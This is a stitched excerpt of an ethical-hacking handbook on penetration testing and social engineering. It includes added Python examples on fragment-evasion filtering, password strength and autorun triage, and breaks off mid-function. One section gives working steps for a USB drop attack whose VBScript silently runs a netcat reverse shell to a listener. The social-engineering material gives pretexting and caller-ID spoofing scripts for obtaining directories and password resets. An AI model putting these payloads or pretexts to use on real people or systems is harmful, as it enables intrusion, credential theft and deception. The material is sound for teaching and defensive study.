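def matches_signature(data: bytes) -> bool:
    return SIGNATURE in data


def first_fragment_only(frags: List[Fragment]) -> bool:
    """The 'cut through' policy: look at the offset-0 fragment and wave the
    rest through.  Returns True if the filter would block the datagram."""
    return any(f.offset == 0 and matches_signature(f.payload) for f in frags)


class Reassembler:
    """Buffers fragments per datagram and returns the full payload once every
    byte from offset 0 up to the last fragment is present."""

    def __init__(self) -> None:
        self.buffers: Dict[int, Dict[int, Fragment]] = {}

    def add(self, frag: Fragment) -> Optional[bytes]:
        self.buffers.setdefault(frag.ident, {})[frag.offset] = frag
        return self._complete(frag.ident)

    def _complete(self, ident: int) -> Optional[bytes]:
        frags = sorted(self.buffers[ident].values(), key=lambda f: f.offset)
        expected = 0
        for f in frags:
            if f.offset != expected:
                return None                 # gap: a fragment is still missing
            expected += len(f.payload)
        if frags[-1].more:
            return None                     # last fragment not seen yet
        del self.buffers[ident]
        return b"".join(f.payload for f in frags)


def reassemble_then_inspect(frags: List[Fragment]) -> bool:
    """Inspect the datagram only once it is whole; True if it would be blocked."""
    r = Reassembler()
    for f in frags:
        data = r.add(f)
        if data is not None and matches_signature(data):
            return True
    return False


# Constructed datagrams.  In SPLIT the signature straddles two fragments, so no
# single fragment contains it; REVERSED delivers the same fragments out of
# order; CLEAN carries nothing of interest.
SPLIT = [
    Fragment(ident=7, offset=0, more=True, payload=b"GET /index.html BAD-PA"),
    Fragment(ident=7, offset=22, more=False, payload=b"TTERN HTTP/1.0\r\n"),
]
REVERSED = list(reversed(SPLIT))
CLEAN = [
    Fragment(ident=8, offset=0, more=True, payload=b"GET /index.html HTTP/1"),
    Fragment(ident=8, offset=22, more=False, payload=b".0\r\n"),
]

if __name__ == "__main__":
    for name, frags in (("SPLIT", SPLIT), ("REVERSED", REVERSED), ("CLEAN", CLEAN)):
        print(name, "first-fragment-only blocks:", first_fragment_only(frags),
              "reassembled inspection blocks:", reassemble_then_inspect(frags))
```

The reassembler also has to hold fragments until the datagram completes, which is exactly the buffering cost the cut-through configuration avoids; that trade-off is what the engineer is accepting without knowing it.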
In addition, if a company’s employees are not aware of social engineering attacks and how damaging they can be, they may happily give out useful information to attackers. This information is then used to generate even more powerful and dangerous attacks against the company. Knowledge and the implementation of knowledge are the keys for any real security to be accomplished.
So where do we stand on hacking books and hacking classes? Directly on top of a slippery banana peel. There are currently three prongs to the problem of today’s hacking classes and books. First, marketing people love to use the word “hacking” instead of more meaningful and responsible labels such as “penetration methodology.” This means that too many things fall under the umbrella of hacking. All of these procedures now take on the negative connotation that the word “hacking” has come to be associated with. Second is the educational piece of the difference between hacking and ethical hacking, and the necessity of ethical hacking (penetration testing) in the security industry. The third issue has to do with the irresponsibility of many hacking books and classes. If these items are really being developed to help out the good guys, then they should be developed and structured to do more than just show how to exploit a vulnerability. These educational components should show the necessary countermeasures required to fight against these types of attacks and how to implement preventive measures to help ensure these vulnerabilities are not exploited. Many books and courses tout the message of being a resource for the white hat and security professional. If you are writing a book or curriculum for black hats, then just admit it. You will make just as much (or more) money, and you will help eliminate the confusion between the concepts of hacking and ethical hacking.

The Dual Nature of Tools


In most instances, the toolset used by malicious attackers is the same toolset used by security professionals. A lot of people do not seem to understand this. In fact, the books, classes, articles, websites, and seminars on hacking could be legitimately renamed to “security professional toolset education.” The problem is that marketing people like to use the word “hacking” because it draws more attention and paying customers.
As covered earlier, ethical hackers go through the same processes and procedures as unethical hackers, so it only makes sense that they use the same basic toolset. It would not be useful to prove that attackers could not get through the security barriers with Tool A if attackers do not use Tool A. The ethical hacker has to know what the bad guys are using, know the new exploits that are out in the underground, and continually keep her skills and knowledge base up to date. Why? Because the odds are against the company and against the security professional. The security professional has to identify and address all of the vulnerabilities in an environment. The attacker only has to be really good at one or two exploits, or really lucky. A comparison can be made to the U.S. Homeland Security responsibilities. The CIA and FBI are responsible for protecting the nation from the 10 million things terrorists could possibly think up and carry out. The terrorist only has to be successful at one of these 10 million things.

How Are These Tools Used for Good Instead of Evil?


How would a company’s networking staff ensure that all of the employees are creating complex passwords that meet the company’s password policy? They can set operating system configurations to make sure the passwords are of a certain length, contain upper- and lowercase letters, contain numeric values, and keep a password history. But these configurations cannot check for dictionary words or calculate how much protection is being provided from brute-force attacks. So the team can use a hacking tool to carry out dictionary and brute-force attacks on individual passwords to actually test their strength, as illustrated in Figure 1-1. The other choice is to go to each and every employee and ask what his or her password is, write down the password, and eyeball it to determine if it is good enough. Not a good alternative.

Figure 1-1 Password cracking software
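The gap the text describes, as an added example (not from the book, and not the tool in Figure 1-1): the first function is the kind of rule an operating system policy can enforce, the rest are the checks a tester runs that the policy cannot. The wordlist, the substitution table and the guess rate are constructed for the example; a real test would use a full dictionary and measured cracking rates.

```python
"""Added example (not from the book): what an OS password policy can check versus
what only testing reveals.  The wordlist, the substitution table and the guess
rate are constructed for the example; a real check would use a full dictionary."""
import math
import string
from typing import Dict, Optional

WORDLIST = {"password", "welcome", "summer", "company", "letmein"}   # constructed
LEET = str.maketrans("4301$5@!", "aeolssai")   # undo common letter-for-symbol swaps
GUESSES_PER_SECOND = 1e10                      # constructed rate for the estimate


def meets_complexity(pw: str, min_len: int = 8) -> bool:
    """The kind of rule an OS policy enforces: length plus character classes."""
    return (len(pw) >= min_len
            and any(c.islower() for c in pw)
            and any(c.isupper() for c in pw)
            and any(c.isdigit() for c in pw))


def dictionary_base(pw: str) -> Optional[str]:
    """Return the dictionary word the password is built on, if any.

    Strips the digits/punctuation users append or prepend, then undoes the
    usual substitutions before the lookup.  This is what the policy checker
    cannot see and what a dictionary attack finds in its first pass.
    """
    core = pw.strip(string.digits + string.punctuation).translate(LEET).lower()
    return core if core in WORDLIST else None


def keyspace_bits(pw: str) -> float:
    """Size, in bits, of the search space an attacker faces if forced to
    brute-force the character classes actually used in the password."""
    alphabet = 0
    if any(c.islower() for c in pw):
        alphabet += 26
    if any(c.isupper() for c in pw):
        alphabet += 26
    if any(c.isdigit() for c in pw):
        alphabet += 10
    if any(c in string.punctuation for c in pw):
        alphabet += len(string.punctuation)
    return len(pw) * math.log2(alphabet) if alphabet else 0.0


def assess(pw: str) -> Dict[str, object]:
    """Combine the policy view with the tester's view of one password."""
    bits = keyspace_bits(pw)
    word = dictionary_base(pw)
    return {
        "policy_ok": meets_complexity(pw),
        "dictionary_word": word,
        "bits": bits,
        # Worst-case brute-force time; a dictionary hit makes it irrelevant.
        "brute_force_days": (2 ** bits / GUESSES_PER_SECOND) / 86400,
        "weak": word is not None or bits < 60,
    }


if __name__ == "__main__":
    for candidate in ("P4ssw0rd1", "Summer2024!", "xK9#mQ2vLp!"):
        print(candidate, assess(candidate))
```

"P4ssw0rd1" satisfies every rule the policy can express and still reduces to a wordlist entry, which is the case the text says only testing can expose.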


NOTE A company’s security policy should state that this type of password-testing activity is allowed by the IT staff and security team. Breaking employees’ passwords could be seen as intrusive and wrong if management does not acknowledge and allow for such activities to take place. Make sure you get permission before you undertake this type of activity.

The same network staff needs to make sure that their firewall and router configurations will actually provide the protection level that the company requires. They could read the manuals, make the configuration changes, implement ACLs, and then go and get some coffee. Or they could implement the configurations and then run tests against these settings to see if they are allowing malicious traffic into what they thought was a controlled environment. These tests often require the use of hacking tools. The tools carry out different types of attacks, which allow the team to see how the perimeter devices will react in certain circumstances.
Nothing should be trusted until it is tested. There is an amazing number of cases where a company does everything seemingly correct when it comes to their infrastructure security. They implement policies and procedures, roll out firewalls, IDS, and antivirus, have all of their employees attend security awareness training, and continually patch their systems. It is unfortunate that these companies put forth all the right effort and funds only to end up on CNN as the latest victim because all of their customers’ credit card numbers were stolen and posted on the Internet. And this can happen if they do not carry out the necessary vulnerability and penetration tests.

Recognizing Trouble When It Happens


Network administrators, engineers, and security professionals need to be able to recognize when an attack is underway or when one is about to take place. It may seem as though recognizing an attack as it is happening should be easy. This is only true for the very “noisy” or overwhelming attacks such as denial-of-service (DoS) attacks. Many attackers fly under the radar and go unnoticed by security devices and staff members. It is important to know how different types of attacks take place so they can be properly recognized and stopped.
Security issues and compromises are not going to go away any time soon. People who work in positions within corporations that touch security in any way should not try to ignore it or treat security as though it is an island unto itself. The bad guys know that to hurt an enemy is to take out what that victim depends upon most. Today the world is only becoming more dependent upon technology, not less. Even though application development and network and system configuration and maintenance are complex, security is only going to become more entwined with them. When a network staff has a certain level of understanding of security issues and how different compromises take place, they can act more effectively and efficiently when the “all hands on deck” alarm is sounded.
It is also important to know when an attack may be around the corner. If network staff is educated on attacker techniques and they see a ping sweep followed a day later by a port scan, they will know that most likely in three hours their systems will be attacked. There are many activities that lead up to different attacks, so understanding these items will help the company protect itself. The argument can be made that we have more automated security products that identify these types of activities so that we don’t have to see them coming. But depending upon software that does not have the ability to put the activities in the necessary context and make a decision is very dangerous. Computers can outperform any human on calculations and performing repetitive tasks, but we still have the ability to make some necessary judgment calls because we understand the grays in life and do not just see things in 1s and 0s.
So it is important to understand that hacking tools are really just software tools that
carry out some specific type of procedure to achieve a desired result. The tools can be
used for good (defensive) purposes or for bad (offensive) purposes. The good and the
bad guys use the same exact toolset; the difference is their intent when operating these
utilities. It is imperative for the security professional to understand how to use these
tools and how attacks are carried out if he is going to be of any use to his customer and
to the industry.

Emulating the Attack


Once network administrators, engineers, and security professionals understand how
attackers work, then they can emulate their activities to carry out a useful penetration
test. But why would anyone want to emulate an attack? Because this is the only way to
truly test an environment’s security level—you must know how it will react when a real
attack is being carried out.
This book is laid out to walk you through these different steps so you can understand how many types of attacks take place. It can help you develop methodologies for emulating similar activities to test your company’s security posture.
There are already many elementary ethical hacking books available in every bookstore. The demand for these books and hacking courses over the years has reflected the interest and the need in the market. It is also obvious that, although some people are just entering this sector, many individuals are ready to move on to the more advanced topic of ethical hacking. The goal of this book is to go through some of the basic ethical hacking concepts quickly and then spend more time with the concepts that are not readily available to you, but are unbelievably important.
Just in case you choose to use the information in this book for unintended purposes (malicious activity), in the next chapters, we will also walk through several federal laws that have been put into place to scare you away from this activity. A wide range of computer crimes are taken seriously by today’s court system, and attackers are receiving hefty fines and jail sentences for their activities. Don’t let that be you. There is just as much fun and intellectual stimulation to be had working as a white hat—and no threat of jail time!

Where Do Attackers Have Most of Their Fun?


Hacking into a system and environment is almost always carried out by exploiting vulnerabilities in software. Only recently has the light started to shine on the root of the problem of successful attacks and exploits, which is flaws within software code. Most attack methods described in this book can be carried out because of errors in the software.
It is not fair to put all of the blame on the programmers, because they have done exactly what their employers and market have asked them to: quickly build applications with tremendous functionality. Only over the last few years has the market started screaming for functionality and security, and the vendors and programmers are scrambling to meet these new requirements and still stay profitable.

Security Does Not Like Complexity


Software, in general, is very complicated, and the more functionality that we try to shove into applications and operating systems, the more complex software will become. The more complex software gets, the harder it is to predict properly how it will react in all possible scenarios, which makes it much harder to secure.
Today’s operating systems and applications are increasing in lines of code (LOC). Windows operating systems have approximately 40 million LOC. Unix and Linux operating systems have much less, usually around 2 million LOC. A common estimate used in the industry is that there are between 5–50 bugs per 1,000 lines of code. So a middle-of-the-road estimate would be that Windows 7 has approximately 1,200,000 bugs. (Not a statement of fact; just a guesstimation.)
It is difficult enough to try to logically understand and secure 40 million LOC, but the complexity does not stop there. The programming industry has evolved from traditional programming languages to object-oriented languages, which allow for a modular approach to developing software. This approach has a lot of benefits: reusable components, faster to market times, decrease in programming time, and easier ways to troubleshoot and update individual modules within the software. But applications and operating systems use each other’s components, users download different types of mobile code to extend functionality, DLLs are installed and shared, and instead of application-to-operating system communication, today many applications communicate directly with each other. The operating system cannot control this type of information flow and provide protection against possible compromises.
If we peek under the covers even further, we see that thousands of protocols are integrated into the different operating system protocol stacks, which allows for distributed computing. The operating systems and applications must rely on these protocols for transmission to another system or application, even if the protocols contain their own inherent security flaws. Device drivers are developed by different vendors and installed in the operating system. Many times these drivers are not well developed and can negatively affect the stability of an operating system. And to get even closer to the hardware level, injection of malicious code into firmware is an up-and-coming attack avenue.
So is it all doom and gloom? Yep, for now. Until we understand that a majority of the successful attacks are carried out because software vendors do not integrate security into the design and specification phases, our programmers have not been properly taught how to code securely, vendors are not being held liable for faulty code, and consumers are not willing to pay more for properly developed and tested code, our staggering hacking and company compromise statistics will only increase.
Will it get worse before it gets better? Probably. Every industry in the world is becoming more reliant on software and technology. Software vendors have to carry out the continual one-upmanship to ensure their survivability in the market. Although security is becoming more of an issue, functionality of software has always been the main driving component of products, and it always will be. Attacks will also continue and increase in sophistication because they are now revenue streams for individuals, companies, and organized crime groups.
Will vendors integrate better security, ensure their programmers are properly trained in secure coding practices, and put each product through more and more testing cycles? Not until they have to. Once the market truly demands that this level of protection and security is provided by software products and customers are willing to pay more for security, then the vendors will step up to the plate. Currently, most vendors are only integrating protection mechanisms because of the backlash and demand from their customer bases. Unfortunately, just as September 11th awakened the United States to its vulnerabilities, something large may have to take place in terms of software compromise before the industry decides to address this issue properly.
So we are back to the original question: what does this have to do with ethical hacking? A novice ethical hacker will use tools developed by others who have uncovered specific vulnerabilities and methods to exploit them. A more advanced ethical hacker will not just depend upon other people’s tools; she will have the skill set and understanding to look at the code itself. The more advanced ethical hacker will be able to identify possible vulnerabilities and programming code errors and develop ways to rid the software of these types of flaws.
If the software did not contain 5–50 exploitable bugs within every 1,000 lines of code, we would not have to build the fortresses we are constructing today. Use this book as a guide to bring you deeper and deeper under the covers to allow you to truly understand where the security vulnerabilities reside and what should be done about them.
Social Engineering Attacks
CHAPTER 4

Social engineering is a way to get someone to do something they wouldn’t normally do for you, such as give you a private telephone number or internal confidential information, by creating a false trust relationship with them. It’s no different from a common confidence game, also known as a “con,” played by criminals the world over every day. You could even go as far as to say that the Greeks’ Trojan horse was an early act of social engineering. That it successfully put the Greek army inside the city of Troy in mere hours after ten years of siege had failed is worth noting. The Greeks were able to decisively defeat the Trojans in one evening once inside the city wall, a theme often repeated on the digital battlefield today.

In this chapter, we’re going to talk about social engineering in the context of modern
information security practice. You’re going to learn how to perform social engineering
so that you are better prepared to defend against it. Like so many techniques in this
book, the only thing that separates the gray hat hacker from a common criminal is
ethical behavior. This is especially true for social engineering, as it is arguably one of the
most powerful ways to gain access to your target’s information assets.
In this chapter, we cover the following topics:

• How a social engineering attack works
• Conducting a social engineering attack
• Common attacks used in penetration testing
• Preparing yourself for face-to-face attacks
• Defending against social engineering attacks

How a Social Engineering Attack Works


Social engineering attacks cover a wide range of activities. Phishing, for instance, is a social engineering attack (SEA). The victim receives a legitimate-looking e-mail, follows a link to a legitimate-looking website they’re familiar with, and often divulges sensitive information to a malicious third party. As end users are made aware of such activities, the attacks generally must become more sophisticated in order to remain effective. Recently, attacks of this nature have become narrowly targeted at specific companies, often mimicking internal system logins and targeting only individuals working at the subject company. It’s an electronic numbers game conducted from afar, and the reason it is so common is that it works!
At the heart of every SEA is a human emotion, without which the attacks will not
work. Emotion is what derails security policy and practices, by leading the human user
to make an exception to the rules for what they believe is a good reason. Commonly
exploited simple emotions, and an example of how each is exploited, include:

• Greed: A promise you’ll get something very valuable if you do this one thing
• Lust: An offer to look at a sexy picture you just have to see
• Empathy: An appeal for help from someone impersonating someone you know
• Curiosity: Notice of something you just have to know, read, or see
• Vanity: Isn’t this a great picture of you?

These emotions are frequently used to get a computer user to perform a seemingly innocuous action, such as logging into an online account or following an Internet URL from an e-mail or instant messaging client. The actual action is one of installing malicious software on their computer or divulging sensitive information.
Of course, there are more complex emotions exploited by more sophisticated social engineers. While sending someone an instant message with a link that says “I love this photo of you” is a straightforward appeal to their vanity, getting a secretary to fax you an internal contact list or a tech support agent to reset a password for you is quite a different matter. Attacks of this nature generally attempt to exploit more complex aspects of human behavior, such as

• A desire to be helpful: “If you’re not busy, would you please copy this file from this CD to this USB flash drive for me?” Most of us are taught from an early age to be friendly and helpful. We take this attitude with us to the workplace.
• Authority/conflict avoidance: “If you don’t let me use the conference room to e-mail this report to Mr. Smith, it’ll cost the company a lot of money and you your job.” If the social engineer looks authoritative and unapproachable, the target usually takes the easy way out by doing what’s asked of them and avoiding a conflict.
• Social proof: “Hey look, my company has a Facebook group and a lot of people I know have joined.” If others are doing it, people feel more comfortable doing something they wouldn’t normally do alone.

No matter what emotional button the attacker is attempting to push, the premise is always the same: the intended victim will not sense the risk of their action or guess the real intentions of the attacker until it’s too late or, in many cases, not at all. Because the intended victims in these cases most often are working on computers inside of the target company network, getting them to run a remote access program or otherwise grant you remote access directly or indirectly can be the fast track to obtaining targeted sensitive data during a penetration test.

Conducting a Social Engineering Attack
It is important to discuss with your client your intention to conduct social engineering attacks, whether internal or external, before you include them in a penetration test’s project scope. A planned SEA could be traumatic to employees of the target company if they are made aware of the findings in an uncontrolled way, because they might feel just as victimized as they would if subjected to a real attack. If you are caught during this activity, you most likely will not be treated as if you’re “on the same team” by the intended victim. Often, the victim feels as if they’ve been made a fool of.
The client should be made aware of the risks associated with contracting a third party who plans to overtly lie to and manipulate company employees to do things that are clearly against the rules. That said, most companies do accept the risk and see the value of the exercise. Secrecy must also be stressed and agreed upon with the client prior to engaging in a covert exercise like this. If the employees know that there will be a test of any kind, they will of course act differently. This will prevent the penetration testing team from truly learning anything about the subject organization’s true security posture.
Like all penetration testing, an SEA begins with footprinting activity and reconnaissance. The more information you collect about the target organization, the more options become available to you. It’s not uncommon to start with zero knowledge and use information gained through open sources to mount a simple SEA—get the company phone directory, for instance—and then use the new knowledge to mount increasingly targeted and sophisticated SEAs based on the newly gained insight into the company.
While dumpster diving is a classic example of a zero knowledge starting point for
finding information about a target, there are more convenient alternatives. Google is
probably the most effective way to start finding names, job titles, contact information,
and more. Once you have a list of names, start combing through social media sites such
as Facebook, LinkedIn, MySpace, and Twitter. Finding employees with accounts on
popular social media sites is a common practice among social engineers. Often, those
employees will be connected to other people they work with and so on. Depending on
their security settings, their entire network of connections may be visible to you, and
you may be able to identify coworkers easily.
In the case of business networking sites like LinkedIn, the information collection is made even easier for you because you can search by company name to find past and present employees of your target. On any social networking site, you may also find a group for current and ex-employees of a company. Industry-specific blog and board sites can also yield useful information about internal employee issues currently being discussed. Often these posts take the form of anonymous gripes, but they can be useful for demonstrating insider knowledge when striking up a conversation with your target.
Using such passive methods to collect as much information about a company as
possible is a great place to start formulating your attack. We’ll cover some useful ways
to use social media in an actual attack scenario later in this chapter.
Social engineering is most successful as a team effort due to the wide variety of circumstances and opportunities that may arise. At the very least, two people will be needed for some of the examples detailed later in this chapter. While natural charisma is a prized resource, a practiced phone voice and the ability to discuss convincingly a wide variety of not necessarily technical social topics will get you pretty far down the road. The ability to write convincingly also is important, as is your physical appearance should you perform face-to-face attacks or impersonations. As all of these activities are designed to gain unauthorized access to data assets, you must also possess the hacking skills described in this book, or at least be intimately familiar with what is possible in order to help your team get into position on the network to use them.
A good place to start your reconnaissance after researching the company online is to begin targeting people of interest internally in an attempt to build a picture of who is who and, if possible, develop rapport with potential sources. Key personnel might include the CIO, CSO, Director of IT, CFO, Director of HR, VPs, and Directors of any sort. All of these individuals will have voicemail, e-mail, secretaries, and so forth. Knowing who works in which offices, who their personal assistants are, and when they’re traveling or on vacation might not seem worthwhile, but it is. Let’s say the goal is to obtain the internal employee directory. By knowing when someone is out of the office, you can call their assistant and claim that you are a consultant working with their boss and that you need the company directory printed out and faxed to you at another location within the company. Since the assistant will be faxing internally, they won’t see any risk. At this point, they may even ask you if they can e-mail the directory to you, in which case your SEA is a success, but let’s assume they don’t ask and fax the directory to the other office you claim to be working in. You can then call that office, give the story again, and ask that the fax be sent to you at home. You then give them a public fax number and retrieve your fax.
This is a prime example of escalation of trust. The first victim felt no risk in sending something internally. The second victim felt comfortable with the pretext because you demonstrated knowledge of internal operations, and they don’t see any harm in passing along a directory. With the directory in hand, you can now use caller ID spoofing services such as Bluff My Call to appear to be calling from inside the company. The next move is up to you! If the company is like most companies, its network user IDs aren’t hard to figure out, or maybe you’ve already figured out that format from the IT guy you tried to sell an identity management product to on the phone or over a game of pool at the bar you know he goes to from his overly permissive Facebook page. You can now call tech support from inside and have a vacationing VP of HR’s password reset so you can use the virtual private network (VPN) remotely.
Planning an attack takes time, practice, and, above all, patience. Since you’re the attacker, you’re limited only by your imagination. Your success or failure will depend on your team’s ability to read the people who work at the target organization and devise an attack or series of escalating attacks that is effective against them. Keep in mind that it’s a game of capture the flag, and your goal is to access sensitive data to demonstrate to your client how it can be done. Sometimes the goal is obtained without any traditional technical hacking, by using legitimate access methods and stolen or erroneously granted credentials. In other cases, a stolen backup tape will yield everything you need. In most cases, however, it is the combined effort of getting the team hacker(s) in position or delivering the desired remote access payload behind the network border controls.
Chapter 4: Social Engineering Attacks
As your attacks become more sophisticated, you may also be required to set up phony websites, e-mail addresses, and phone numbers in order to appear to be a legitimate company. Thanks to the proliferation of web-based micro businesses and pay-as-you-go mobile phones, this is now as inexpensive as it is trivial. You may also be required to meet face to face with the intended victim for certain types of attacks. We’ll talk about these subjects in more detail in the following sections.

PART II
Reference
Bluff My Call www.bluffmycall.com

Common Attacks Used in Penetration Testing

In this section, we’re going to discuss a few formulaic SEAs that are commonly used in everyday penetration testing. It is important to keep in mind that these attacks may not work every time or work on your specific target, as each environment is different. In fact, the conditions required for any attack to succeed often need to be just right; what didn’t work today may well work tomorrow, and vice versa. The examples in the previous section are hypothetical and primarily designed to help you start thinking like a social engineer, to give you examples of possible starting points. In the following examples, we’ll cover a few attacks that have been repeatedly performed with success. As these attacks are part of a larger penetration test, we’ll only cover the social engineering portion of the attack. Often the SEA is one step removed from, and immediately preceding, physical access, which is covered in Chapter 5.

The Good Samaritan

The goal of this attack is to gain remote access to a computer on the company network.
This attack combines SEA techniques with traditional hacking tools. The basic premise is that a specially prepared USB drive is presented to the target company’s front desk or most publicly accessible reception area. A very honest-looking person in appropriate attire—a business suit if it’s an office, for example—hands the employee at the front desk the USB drive, claiming to have found it on the ground outside. The pretext will change with the specific circumstances; for instance, if the office is one floor in a high rise, you might say you found the USB drive in the elevator, or if it’s a secured campus, you may dress like a landscaper and say you found it on the campus grounds. The USB drive should look used, have the company name on it, and be labeled with, for example, “HR Benefits” and the current year. What you write on the label of the key is up to you. You’re trying to bait an employee to plug it into a computer, something they may know they shouldn’t do, so the reward must seem greater than the risk of violating policy. It should whisper “interesting” but not be too obvious. For instance, “Cost Cuts 2010” is a good label, but “Nude Beach” probably isn’t. When the USB drive is plugged in, it attempts to install and run a remote access Trojan and pass a command prompt out to your team across the public Internet. Obviously, what you have the key run is completely up to you. In this example, we’ll focus on a very simple remote command prompt.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition
Putting this attack together is fairly academic insofar as the main work is in the preparation of the USB drive. The delivery is trivial and can be attempted multiple times and at multiple target locations. For this attack to work, the target environment must allow the use of USB drives and must have autorun enabled. Despite the fact that these two vulnerabilities are widely known and it is considered a best practice to disable or at least actively manage both, this attack is still remarkably effective. Preparing the USB drive to autorun your payload is a fairly straightforward process as well. For this example, you’ll need

• A USB drive; in this example, we’ll use an inexpensive SanDisk Cruzer Micro drive.
• A tool to edit an ISO image file; in this example, we’ll use ISO Commander.
• A tool from the manufacturer to write the new ISO image to the drive; in this example, we’ll use the SanDisk U3 Launchpad, LPInstaller.exe.
• A remote access Trojan; in this example, we’ll simply use a Windows version of netcat.

There are prepackaged kits, such as USB Switchblade and USB Hacksaw, that do a lot of the work for you, but they’re also widely known by antivirus companies. To reduce the risk of being detected, it’s better to make your own routine.
In this example, we’re going to use a 1GB SanDisk Cruzer Micro model with U3. Start by downloading the Launchpad Installer application, LPInstaller.exe, from the SanDisk website. You’ll find it under the Support section by using the Find Answers search box. This application will download the default U3 ISO image from the SanDisk website and install it on the flash drive. We’re going to trick it into installing an ISO image we’ve modified so that when the USB drive is plugged into the target machine, it runs code we specify in addition to the U3 Launchpad application.
Once you have the LPInstaller.exe application downloaded, execute it. If you have a personal firewall that operates with a white list, you may have to allow the application access to the Internet. You must be connected to the Internet in order for the application to download the default ISO image from SanDisk. After the application runs, it will require you to plug in a compatible device before it will allow you to continue. Once it recognizes a compatible device, you can click Next until you get to the final screen before it writes the image to the flash drive. It should look like this:
The moment the LPInstaller.exe application detected a compatible flash drive, it began downloading the default U3 ISO image from the SanDisk website. This image is temporarily stored on the user PC in the Application Data section of the current user’s Documents and Settings directory in a folder called U3. The U3 folder has a temp folder that contains a unique session folder containing the downloaded ISO file, as shown here:

You must wait until the ISO image completely downloads before you can edit it. In this case, it’s rather small, finishing up at just over 7MB. Once it’s completely downloaded, we’ll use an ISO editing utility to add our own files to the ISO image before we allow the LPInstaller application to save it to the flash drive. In this example, we’ll use a simple ISO editing tool called ISO Commander, a copy of which can be freely downloaded from the location specified at the end of this section. Open ISO Commander, navigate to the U3 data directory, and select the downloaded ISO file, which is PelicanBFG-autorun.iso in this case. Since we’ll need to install our own version of autorun.inf, it’s convenient to simply extract and modify the autorun.inf file that came with the ISO image. Simply right-click the autorun.inf file and select Extract, as shown next, and then save it to another location for editing.
The default autorun.inf file is simple and contains only a few directives. In this example, we will replace the executable call with a script of our own. Our script will perform an attack using netcat to push a command shell to a remote computer, and then execute the originally specified program, LaunchU3.exe, so that the user won’t notice any abnormal behavior when they plug the USB drive in. The unedited autorun.inf file is as follows:
[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG
[Comment]
brand=PelicanBFG

For our purposes, we’ll only edit the second line of this file and change it from
open=wscript LaunchU3.exe -a

to
open=wscript cruzer/go.vbs

When the autorun.inf file is executed on insertion of the device, our go.vbs script will run instead of the LaunchU3.exe application. We’ll put it in a directory called cruzer along with the netcat binary nc.exe in an attempt to make it slightly less noticeable at a casual glance. Next we need to create our go.vbs script. Since we’re just demonstrating the technique, we’ll keep it very simple, as shown next. The script will copy the netcat binary to the Windows temp directory and then execute the netcat command with options to bind a cmd.exe command shell and pass it to a remote computer.
'This prevents the script from throwing errors in the event it has trouble
On Error Resume Next
set objShell = WScript.CreateObject("WScript.Shell")
'Get the location of the temp directory
temp=objShell.ExpandEnvironmentStrings("%temp%")
'Get the location of the Windows Directory
windir=objShell.ExpandEnvironmentStrings("%windir%")
set filesys=CreateObject("Scripting.FileSystemObject")
'Copy our netcat into the temp directory of the target
filesys.CopyFile "cruzer\nc.exe", temp & "\"
'Wait to make sure the operation completes
WScript.Sleep 5000
'Throw a command prompt to the waiting remote computer, a local test in this case.
'The 0 at the end of the line specifies that the command box NOT be displayed to
'the user.
objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106 443",0
'Execute the application originally specified in the autorun.inf file
objShell.Run "LaunchU3.exe -a"
The preceding script is documented step by step in the comments. VBScript is used as opposed to batch files because it gives more control over what the user sees on the screen. This example is configured to run silently even if it encounters multiple errors and cannot continue. It uses Windows environment variables to determine where the Windows directory is so that it can easily find the command shell binary cmd.exe on multiple versions of Windows. It uses the same technique to determine the default Windows temp directory.

Now that we have our autorun.inf file modified and our go.vbs script written, it’s time to put them into the ISO file the LPInstaller application is about to write to the flash drive. Using the ISO Commander application with the LPInstaller ISO file still open, drag and drop the edited autorun.inf file into the root of the image file system. Then, using either a right-click, the toolbar, or pull-down menus, create a new folder named cruzer. In ISO Commander, each method creates a folder titled New Folder, which must be renamed. Drag and drop the go.vbs and nc.exe files into the cruzer directory, save your changes, and exit ISO Commander before continuing.
Continue by clicking the Next button on the LPInstaller application, and the edited ISO image will be written to the flash drive. In the preceding example, an IP address is specified in the local network for testing purposes. From the command prompt on the machine that will receive the command shell from the target machine, instruct netcat to listen on TCP port 443 as follows:
C:\nc -l -p 443

Port 443 is a common port to use as it is difficult to proxy and monitor, as the legitimate traffic that would typically flow over it is encrypted. If everything works, you will receive a command prompt with the drive letter that the U3 file system was assigned by the target machine when it was inserted, as shown here:

This example used very simple tools to create a remote access Trojan. In reality, the attack contained on the USB drive can be vastly more complex and stealthy. Once you are comfortable making and writing your own ISO images to the flash drive, you can experiment with more complex payloads. It’s even possible to create a Trojan executable to replace the LaunchU3.exe application in the event the user has autorun turned off but still wants to use the U3 features. Alternatively, you can place on the USB device a document file with an appealing name that contains an exploit, in an attempt to entice the target to open it. As with most gray hat attacks, this one is limited only by your imagination.
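The autorun.inf edit described in this section is also exactly what a defender looks for when triaging a drive found in a lobby. The following Python script is an added example written for this edition of the text, not code from the book, from SanDisk, or from any tool the chapter names. It parses the two autorun.inf variants shown above (reproduced here as constructed sample input) and reports the properties that separate the modified image from the stock one: a script host in the launch command, a script-file target, a launch target outside the drive root, and an icon= entry that advertises a different program than the one actually run. The category names, the host and extension lists, and the low/medium/high grading are assumptions made for this example, not anything the page specifies.

```python
"""Defensive triage of autorun.inf files found on removable media.

Added example, not from the book: parses the [AutoRun] section and reports the
properties that distinguish the modified U3 image described in the text from
the stock one. Rule names, host/extension lists and risk grades are assumptions
made for this example.
"""
import re
from typing import Dict, List, Tuple

# Command interpreters and script hosts a plain "run the launcher" autorun has no need for.
SCRIPT_HOSTS = {"wscript", "cscript", "cmd", "powershell", "mshta", "rundll32"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".ps1", ".hta")

# The two autorun.inf variants quoted on this page (constructed sample input so the
# example runs offline; the [Update] and [Comment] sections are omitted).
STOCK_AUTORUN = """[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
"""
MODIFIED_AUTORUN = STOCK_AUTORUN.replace("open=wscript LaunchU3.exe -a", "open=wscript cruzer/go.vbs")


def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
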